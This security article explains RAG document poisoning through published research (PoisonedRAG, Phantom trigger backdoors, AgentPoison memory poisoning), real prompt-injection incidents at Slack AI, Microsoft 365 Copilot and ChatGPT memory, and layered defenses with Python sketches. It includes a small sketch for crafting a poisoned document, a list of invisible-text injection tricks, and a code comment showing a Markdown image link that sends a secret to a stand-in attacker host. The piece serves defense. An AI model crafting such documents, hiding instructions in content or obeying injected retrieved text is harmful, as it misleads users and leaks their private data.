
RAG (Retrieval-Augmented Generation) document poisoning lets attackers corrupt what your AI believes by injecting false or malicious content into its knowledge base. Unlike model-level attacks, a single poisoned document fires on every relevant query, from every user, indefinitely—without any modification to the underlying model.

What Is RAG Document Poisoning?

Most enterprise AI systems deployed today don’t rely solely on a model’s training data. Instead, they use Retrieval-Augmented Generation: when a user asks a question, the system searches an external document store—a vector database like Pinecone, ChromaDB, or Weaviate—fetches the most relevant chunks, and feeds them to the LLM as context before generating an answer.

This architecture solves a real problem. It keeps AI responses current without expensive retraining, grounds answers in company-specific data, and reduces hallucination. More than 30% of enterprise AI applications now use RAG as of 2025, according to industry estimates.

The architecture also introduces a critical trust assumption: retrieved documents are implicitly treated as authoritative context. User queries get validated, sanitized, and rate-limited. Retrieved documents typically do not. Both ultimately enter the same LLM prompt—but only one is treated with suspicion.

Document poisoning exploits this gap.
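The trust gap is easy to see in code. The sketch below is illustrative (the function names and validation rules are assumptions, not taken from any specific framework): the user's query passes through validation, while retrieved chunks flow into the prompt verbatim.

```python
# Illustrative sketch of the RAG trust gap; names and rules are hypothetical.

def validate_query(query: str) -> str:
    # User input is length-limited and stripped before use.
    if len(query) > 500:
        raise ValueError("query too long")
    return query.strip()

def build_prompt(query: str, retrieved_chunks: list[str]) -> str:
    # Retrieved documents, by contrast, are pasted in verbatim: any
    # instructions embedded in a poisoned chunk reach the LLM unfiltered.
    context = "\n\n".join(retrieved_chunks)
    return f"Context:\n{context}\n\nQuestion: {validate_query(query)}\n\nAnswer:"
```

Both strings end up in the same prompt; only one of them passed through a filter.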

How the Attack Works

The canonical attack, formalized in the PoisonedRAG paper published by researchers at Penn State and the Illinois Institute of Technology (arXiv:2402.07867, accepted to USENIX Security 2025), requires two conditions:

  1. The poisoned document achieves higher cosine similarity to target queries than legitimate sources.
  2. The retrieved content causes the LLM to produce the attacker’s desired output.

In practice, this is easier than it sounds. The researchers demonstrated that injecting just five malicious documents into a knowledge base containing millions achieves over 90% attack success rate. In black-box experiments against PaLM 2, results reached 97% on the Natural Questions benchmark, 99% on HotpotQA, and 91% on MS-MARCO.1
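In the black-box setting, a poisoned document can be as simple as the target query followed by an authoritative assertion of the attacker's answer. The sketch below is a simplified illustration of that two-condition structure, not the paper's full optimization procedure; all names are hypothetical.

```python
def craft_poisoned_document(target_query: str, desired_answer: str) -> str:
    # Condition 1 (retrieval): repeating the target query verbatim pushes
    # the document's cosine similarity to that query toward the top rank.
    # Condition 2 (generation): authoritative phrasing nudges the LLM to
    # repeat the attacker's answer as fact.
    return (
        f"{target_query} "
        f"According to the latest verified records, the answer is {desired_answer}."
    )
```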

Researcher Amine Raji, PhD, reproduced similar results on a local consumer hardware setup—Qwen2.5-7B-Instruct with ChromaDB—measuring a 95% success rate for knowledge base poisoning on an undefended stack. No cloud infrastructure required.2

The structural insight is precise: an attacker doesn’t need to compromise the LLM, the application, or the users. They only need to get a document into the knowledge base. From there, the retrieval system does the rest.

A Taxonomy of RAG Attacks

Research since 2024 has produced a rich taxonomy of distinct attack variants, each with different entry points and objectives.

| Attack Type | Entry Point | Success Rate | Venue |
| --- | --- | --- | --- |
| Corpus Poisoning (PoisonedRAG) | Knowledge base write access | 90–99% | USENIX Security 2025 |
| Trigger Backdoor (Phantom) | Single injected document | ~90% | arXiv 2024 |
| Agent Memory Poisoning (AgentPoison) | Agent episodic/procedural memory | ≥80% | NeurIPS 2024 |
| Query-Targeted Denial of Service | Single blocker document | High | USENIX Security 2025 |
| Cross-Tenant Data Leakage | Standard query | 100% | Amine Raji Labs |
| Multimodal Poisoning (PoisonedEye) | Single image-text pair | High | ICML 2025 |
| Memory Persistence (SpAIware) | Document or website | Ongoing | ScienceDirect 2025 |

Trigger-Based Backdoors: The Phantom Attack

Phantom (arXiv:2405.20485, Harsh Chaudhari et al.) injects a single document that remains completely dormant during normal queries. It only activates when a specific trigger token sequence appears in the user’s query. The document is optimized in two stages: first to ensure retrieval only when the trigger fires, then to induce specific LLM behaviors—refusal, harmful content, reputation damage, or privacy violations.3

Phantom demonstrated a 90% attack success rate across RAG systems built on popular open models including Gemma, Vicuna, and Llama, with confirmed transfer to GPT-3.5 Turbo and GPT-4. It was also successfully executed against NVIDIA’s production “Chat with RTX” system in black-box conditions.

Agent Memory Poisoning: AgentPoison

AgentPoison (arXiv:2407.12784, NeurIPS 2024) targets AI agents that use RAG for episodic or procedural memory—a growing architecture where agents “remember” past interactions by storing and retrieving from a knowledge base.4

The attack poisons the agent’s long-term memory with a small number of malicious demonstrations containing an optimized trigger. Results: ≥80% attack success rate with less than 0.1% poison rate—meaning the attacker needs to inject fewer than one document per thousand to control agent behavior. Demonstrated on three real-world agent types: autonomous driving, knowledge-intensive QA, and the healthcare EHRAgent.

Invisible Content Injection

Documents can contain instructions invisible to human reviewers but fully parsed by LLMs:

  • White text on white background
  • Font size zero text
  • Zero-width Unicode characters (U+200B, U+200C)
  • Bidirectional text reordering
  • ASCII smuggling: encoding instructions in Unicode lookalike characters

The ACM AISec Workshop 2024 paper “The Hidden Threat in Plain Text: Attacking RAG Data Loaders” specifically covers attacks via document parsing pipelines, where these techniques defeat visual review entirely.5
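A first line of defense is normalizing text at ingest, before any chunk reaches the embedder. The sketch below strips zero-width characters and Unicode Tag code points (the range used for ASCII smuggling) and applies NFKC normalization to fold lookalike characters; the exact character set and return shape are illustrative assumptions.

```python
import unicodedata

# Zero-width characters used for invisible injection, plus the Unicode
# Tags block (U+E0000-U+E007F) abused for ASCII smuggling.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

def _is_tag(ch: str) -> bool:
    return 0xE0000 <= ord(ch) <= 0xE007F

def sanitize_text(text: str) -> tuple[str, bool]:
    """Strip invisible characters and normalize lookalikes.
    Returns (cleaned_text, was_suspicious)."""
    suspicious = any(ch in ZERO_WIDTH or _is_tag(ch) for ch in text)
    cleaned = "".join(ch for ch in text if ch not in ZERO_WIDTH and not _is_tag(ch))
    # NFKC folds many lookalike code points (e.g. fullwidth letters)
    # to their ASCII equivalents.
    return unicodedata.normalize("NFKC", cleaned), suspicious
```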

Cross-Tenant Data Leakage

In multi-tenant enterprise deployments—shared RAG infrastructure where multiple departments or customers share the same vector database—if access control is enforced at the application layer but not at the retrieval layer, any user can submit a query semantically similar to another tenant’s documents and retrieve them.

Amine Raji measured cross-tenant leakage at 100% success rate across 20 test queries, with zero technical sophistication required. A legitimate user asking a relevant business question is sufficient.2
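The fix is to enforce the tenant filter inside the retrieval call itself, so application-layer mistakes cannot bypass it. A minimal in-memory sketch (the store layout and function names are hypothetical; production systems would use their vector database's native metadata filtering):

```python
import math

def cosine(a: list[float], b: list[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def retrieve(store, query_embedding, tenant_id, k=5):
    # Filter by tenant BEFORE similarity ranking: a semantically similar
    # document belonging to another tenant never enters the candidate set.
    # 'store' rows are (tenant_id, text, embedding) tuples.
    candidates = [(text, emb) for (tid, text, emb) in store if tid == tenant_id]
    ranked = sorted(candidates, key=lambda c: cosine(query_embedding, c[1]),
                    reverse=True)
    return [text for text, _ in ranked[:k]]
```

Because filtering happens before ranking, no query can pull another tenant's documents into the context window, however similar they are.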

Real-World Incidents

The theoretical attack surface became concrete in 2024, with multiple production systems affected.

Slack AI Data Exfiltration (August 2024)

Discovered by PromptArmor and documented by security researcher Simon Willison, the Slack AI attack demonstrated the full RAG poisoning chain in a widely deployed system. Slack AI uses RAG-style retrieval over public channels, private channels, and uploaded files.

An attacker posting poisoned tokens in a public Slack channel could cause Slack AI to render a crafted Markdown image link when a legitimate user queried the AI. The image URL contained exfiltrated private data in its query string, transmitting it to the attacker’s server. A Slack update on August 14, 2024 expanding Slack AI to include DM files widened the attack surface.6
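One mitigation for this class of exfiltration is an output monitor that strips Markdown images pointing at non-allow-listed hosts before the UI renders them. The sketch below illustrates the idea; it is not Slack's actual fix, and the regex and names are assumptions.

```python
import re
from urllib.parse import urlparse

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)]+)\)")

def strip_untrusted_images(answer: str, allowed_hosts: set[str]) -> str:
    # Markdown images render automatically in many chat UIs, so a crafted
    # ![...](https://attacker.example/?q=SECRET) link can exfiltrate data
    # with zero clicks. Drop any image whose host is not allow-listed.
    def replace(m: re.Match) -> str:
        host = urlparse(m.group(1)).netloc
        return m.group(0) if host in allowed_hosts else "[image removed]"
    return MD_IMAGE.sub(replace, answer)
```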

Microsoft 365 Copilot ASCII Smuggling (2024)

Security researcher Johann Rehberger demonstrated a combined attack against Microsoft 365 Copilot: RAG poisoning via malicious emails or documents, combined with automatic tool invocation and ASCII smuggling (Unicode lookalike characters to render invisible data), with hyperlink manipulation for exfiltration.7

The attack was disclosed to Microsoft in January 2024 and presented publicly at HITCON CMT in August 2024. Zenity CTO Michael Bargury and AI security engineer Tamir Ishay Sharbat demonstrated a related variant, “Living off Microsoft Copilot,” at Black Hat USA 2024. A related zero-click variant, CVE-2025-32711 (“EchoLeak”), was disclosed in 2025 after Microsoft patched the original ASCII smuggling flaw.

SpAIware: ChatGPT Persistent Memory Poisoning (September 2024)

Johann Rehberger demonstrated that a malicious website or document analyzed via ChatGPT could inject persistent instructions into ChatGPT’s long-term memory. Because memory persists across all future sessions in a RAG-style architecture, every subsequent conversation included the attacker’s instructions, enabling ongoing data exfiltration.8

OpenAI patched this in ChatGPT version 1.2024.247. A peer-reviewed paper, “SpAIware: Uncovering a novel artificial intelligence attack vector through persistent memory in LLM applications and agents,” was subsequently published in ScienceDirect (2025).

The AI Supply Chain Parallel

Security Magazine framed RAG poisoning explicitly as “the new software supply chain attack”—and the structural parallel is exact.9

In software supply chains, attackers compromise a dependency that gets included in many downstream builds. In RAG supply chains, attackers compromise a document that gets included in many downstream AI responses. The leverage is similar: one injection point, broad impact, difficult attribution.

RAG supply chain attack vectors include:

  • Third-party data feeds: Any external dataset—web crawls, RSS feeds, vendor documentation—ingested into a knowledge base is a supply chain input. If it’s not validated at ingest, it’s an unmonitored attack surface.
  • Shared model repositories: A 2024 investigation by Wiz and Hugging Face identified over 100 malicious models on the Hugging Face Hub capable of injecting malicious code into downstream pipelines.10
  • Wikipedia poisoning at scale: Research by Carlini et al. (2024) demonstrated that up to 6.5% of English Wikipedia could be modified during precisely timed windows before its bimonthly data dumps, enabling poisoning of virtually every LLM pre-training and RAG pipeline that includes Wikipedia.
  • CI/CD pipeline ingestion: Automated document ingestion without human review is an unmonitored ingestion path by definition.

NIST addressed this directly in AI 100-2e2025, which added distinct subsections on data poisoning and model poisoning in the context of supply chain attacks, explicitly recognizing third-party foundation model supply chains as a distinct risk category.11

Defense: What the Research Shows

The most quantitatively rigorous defense benchmarking comes from Amine Raji’s research, testing five layered defenses against a ChromaDB+LLM stack:2

| Defense Layer | Poisoning Attack | Injection (markers) | Injection (semantic) | Cross-Tenant |
| --- | --- | --- | --- | --- |
| No defense | 95% | 55% | 70% | 100% |
| Ingestion sanitization | 95% | 0% | 70% | — |
| Access-controlled retrieval | 70% | — | — | 0% |
| Prompt hardening | 90% | 20% | Reduced | — |
| Output monitoring | 60% | 10% | Partial | — |
| Embedding anomaly detection | 20% | — | — | — |
| All five combined | 10% | 0% | 15% | 0% |

Two findings are especially notable:

Embedding anomaly detection is the single most effective standalone control. Flagging documents with greater than 85% cosine similarity to existing content, or tight clustering among new ingest candidates, reduces poisoning success from 95% to 20%—with no additional models required, operating on embeddings already computed at ingestion.

Semantic injection remains the hardest problem. Even with all five defenses combined, semantic injection—using authoritative natural language with no structural markers—still achieves a 15% success rate. This attack type requires ML-based intent classification or human editorial review to close fully.

Additional defenses with measured results:

  • SecureRAG / Perplexity-Based Filtering (arXiv .25025): Two-stage filtering combining expanded retrieval scope with chunk-wise perplexity analysis. Poisoned texts often show large perplexity discrepancies between chunks.
  • RAGuard (NeurIPS 2025): Fine-tunes dense retrievers using synthetic poisoned documents to downrank malicious passages, combined with zero-knowledge inference patching that identifies suspicious documents based on causal influence on QA correctness.
  • Combined sanitization pipeline: Sanitization + Unicode normalization (targeting zero-width characters) + attribution-gated prompting achieves a macro-average attack success rate of 4.7% on the Hidden-in-Plain-Text benchmark.12
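The chunk-wise perplexity idea can be sketched as a simple outlier test over per-chunk scores. Computing the perplexities themselves requires a language model and is omitted here; the ratio threshold is an illustrative assumption, not a value from any of the papers above.

```python
import statistics

def flag_anomalous_chunks(chunk_perplexities: list[float],
                          ratio: float = 3.0) -> list[int]:
    # chunk_perplexities: one perplexity score per chunk, computed upstream
    # by any language model. Text optimized for retrieval rather than
    # fluency tends to score far from its neighbors, so chunks whose
    # perplexity deviates from the document median by more than `ratio`
    # in either direction are flagged for review.
    med = statistics.median(chunk_perplexities)
    return [i for i, p in enumerate(chunk_perplexities)
            if p > ratio * med or p < med / ratio]
```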

A Practical Defensive Checklist

  • Access control enforced at the retrieval layer, not just the application layer
  • Embedding anomaly detection at ingest (cosine similarity and clustering checks)
  • Document chunk scanning post-split, not pre-split
  • Unicode normalization to detect zero-width character injection
  • Provenance metadata attached to every ingested document
  • Perplexity-based filtering for anomalous chunk patterns
  • Semantic similarity filtering to detect retrieval-gaming
  • Human review pipeline for high-privilege knowledge bases
  • Tenant isolation at the vector store level in multi-tenant deployments
  • Regular red-team exercises with RAG-specific attack tooling
# Example: Embedding anomaly detection at ingest
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

def check_document_anomaly(new_embedding, existing_embeddings, threshold=0.85):
    """
    Flag documents with suspiciously high similarity to existing content.
    High cosine similarity may indicate adversarial crafting for retrieval gaming.
    """
    if len(existing_embeddings) == 0:
        return False, 0.0
    similarities = cosine_similarity([new_embedding], existing_embeddings)[0]
    max_similarity = float(np.max(similarities))
    return max_similarity > threshold, max_similarity

def check_batch_clustering(batch_embeddings, threshold=0.90):
    """
    Detect tightly clustered ingest batches—a signal of coordinated poisoning.
    """
    n = len(batch_embeddings)
    if n < 2:
        return False
    sim_matrix = cosine_similarity(batch_embeddings)
    np.fill_diagonal(sim_matrix, 0)
    # Average over off-diagonal pairs only; including the zeroed diagonal
    # would understate the mean pairwise similarity.
    mean_pairwise = sim_matrix.sum() / (n * (n - 1))
    return mean_pairwise > threshold

What Practitioners Need to Do Now

RAG document poisoning is not a future risk. PoisonedRAG is published. AgentPoison is published. Slack AI was attacked in production. Microsoft 365 Copilot was attacked in production. ChatGPT’s long-term memory was attacked in production. NVIDIA’s Chat with RTX was attacked with a trigger-based backdoor.

The attack surface grows with every new data source connected to a RAG pipeline. Vendor documentation, internal wikis, customer support tickets, shared Slack channels, email threads—any content ingested for AI retrieval is a potential injection point.

The research is also clear that no single defense closes the gap. Embedding anomaly detection is the most effective standalone control. Access-controlled retrieval eliminates cross-tenant leakage entirely. Combining five layered defenses reduces the attack surface from 95% to 10%. The 15% residual for semantic injection is the frontier where human review and ML-based intent classification remain the only reliable controls.

For organizations building or operating RAG systems: the document store is now part of your security perimeter. Treat it accordingly.


Frequently Asked Questions

Q: Can RAG poisoning affect systems with read-only document stores? A: Yes. Any path that writes to the knowledge base—including CI/CD pipelines, third-party data feeds, and automated web crawls—is a potential attack vector. Read-only access for end users doesn’t protect against poisoning at the ingestion stage.

Q: Does encrypting the vector database prevent document poisoning? A: No. Encryption protects data at rest from unauthorized external access, but it doesn’t prevent authorized ingestion paths (which are the primary attack vector) from writing malicious content. Defense must occur at the ingestion and retrieval logic layers.

Q: How is document poisoning different from prompt injection? A: Prompt injection manipulates the model through user-supplied input at query time; it affects one query from one user. Document poisoning manipulates the knowledge base at ingest time; it persists indefinitely and affects every user who asks a relevant query, without any ongoing attacker involvement.

Q: Are commercial RAG services (AWS Bedrock, Azure AI Search, Google Vertex) vulnerable? A: The architectural vulnerability is fundamental to how RAG works, not specific to any vendor. Commercial platforms add security controls, but the trust gap between query validation and document trust exists across all implementations unless explicitly addressed. Cross-tenant isolation in shared deployments is a separate, measurable risk.

Q: What’s the minimum viable defense for a small team deploying RAG today? A: Implement access-controlled retrieval (eliminates cross-tenant leakage at 0% residual), enforce ingestion sanitization (eliminates marker-based injection), and add Unicode normalization (counters invisible character attacks). These three controls address the highest-success, lowest-sophistication attacks with minimal infrastructure overhead.


Footnotes

  1. Wei Zou, Runpeng Geng, Binghui Wang, Jinyuan Jia. “PoisonedRAG: Knowledge Corruption Attacks to Retrieval-Augmented Generation of Large Language Models.” arXiv:2402.07867. USENIX Security 2025. https://arxiv.org/abs/2402.07867

  2. Amine Raji, PhD. “RAG Security: Knowledge Base Poisoning Succeeds 95% of the Time.” aminrj.com, 2024. https://aminrj.com/posts/rag-security-architecture/

  3. Harsh Chaudhari et al. “Phantom: General Backdoor Attacks on Retrieval Augmented Language Generation.” arXiv:2405.20485. 2024. https://arxiv.org/abs/2405.20485

  4. Zhaorun Chen, Zhen Xiang, Chaowei Xiao, Dawn Song, Bo Li. “AgentPoison: Red-teaming LLM Agents via Poisoning Memory or Knowledge Bases.” NeurIPS 2024. arXiv:2407.12784. https://arxiv.org/abs/2407.12784

  5. “The Hidden Threat in Plain Text: Attacking RAG Data Loaders.” ACM AISec Workshop 2024. https://dl.acm.org/doi/10.1145/3733799.3762976

  6. Simon Willison. “Data exfiltration from Slack AI via indirect prompt injection.” simonwillison.net, August 20, 2024. https://simonwillison.net/2024/Aug/20/data-exfiltration-from-slack-ai/

  7. Johann Rehberger. “Microsoft 365 Copilot: Prompt Injection, Tool Invocation and Data Exfiltration using ASCII Smuggling.” embracethered.com, 2024. https://embracethered.com/blog/posts/2024/m365-copilot-prompt-injection-tool-invocation-and-data-exfil-using-ascii-smuggling/

  8. Johann Rehberger. “SpAIware: Uncovering a novel artificial intelligence attack vector through persistent memory in LLM applications and agents.” ScienceDirect, 2025. https://www.sciencedirect.com/science/article/abs/pii/S0167739X25002894

  9. “Are AI data poisoning attacks the new software supply chain attack?” Security Magazine, 2024. https://www.securitymagazine.com/articles/100590-are-ai-data-poisoning-attacks-the-new-software-supply-chain-attack

  10. Wiz and Hugging Face joint investigation into malicious models hosted on the Hugging Face Hub, 2024.

  11. NIST. “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations.” NIST AI 100-2e2025. https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-2e2025.pdf

  12. “Hidden-in-Plain-Text: A Benchmark for Social-Web Indirect Prompt Injection in RAG Systems.” arXiv:2601.10923. https://arxiv.org/abs/2601.10923
